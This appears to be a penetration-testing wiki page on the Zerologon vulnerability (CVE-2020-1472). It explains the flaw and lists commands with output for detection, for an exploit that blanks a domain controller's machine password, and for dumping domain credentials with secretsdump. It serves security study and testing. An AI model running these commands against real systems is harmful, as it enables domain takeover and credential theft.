Zerologon

What is Zerologon

Zerologon is a critical vulnerability that was first discovered in 2020 and is officially referred to as CVE-2020-1472. It affects the Microsoft Windows Server operating systems, specifically those running the Netlogon Remote Protocol (MS-NRPC).

The vulnerability allows an attacker with network access to a domain controller to impersonate the identity of any computer on that network. By exploiting Zerologon, an attacker can gain unauthorized access to a domain controller, potentially compromising the entire domain.

The vulnerability occurs due to insecure usage of the AES-CFB8 encryption algorithm within the Netlogon authentication process. By sending a series of Netlogon messages with specific parameters, an attacker can set the computer password to a blank value, effectively bypassing authentication.

Detection

Use Netexec (former CME) or PingCastle's scanner to easily detect Zerologon.

netexec smb 192.168.0.1 -u '' -p '' -M zerologon

ZEROLOGO... 192.168.0.1    445    DC01              VULNERABLE
ZEROLOGO... 192.168.0.1    445    DC01              Next step: https://github.com/dirkjanm/CVE-2020-1472

Exploitation

Use Dirkjan's exploit script to easily exploit Zerologon

python cve-2020-1472-exploit.py DC01 192.168.0.1

Performing authentication attempts...
========================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

It will change the DC machine account password to an empty string.

Harvesting

Now use Impacket's Secretsdump to dump the DC's secrets

impacket-secretsdump -no-pass -just-dc lab.local/DC01\[email protected]

 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

Note that the dollar sign is escaped

Tooling

https://github.com/dirkjanm/CVE-2020-1472

Last updated 7 months ago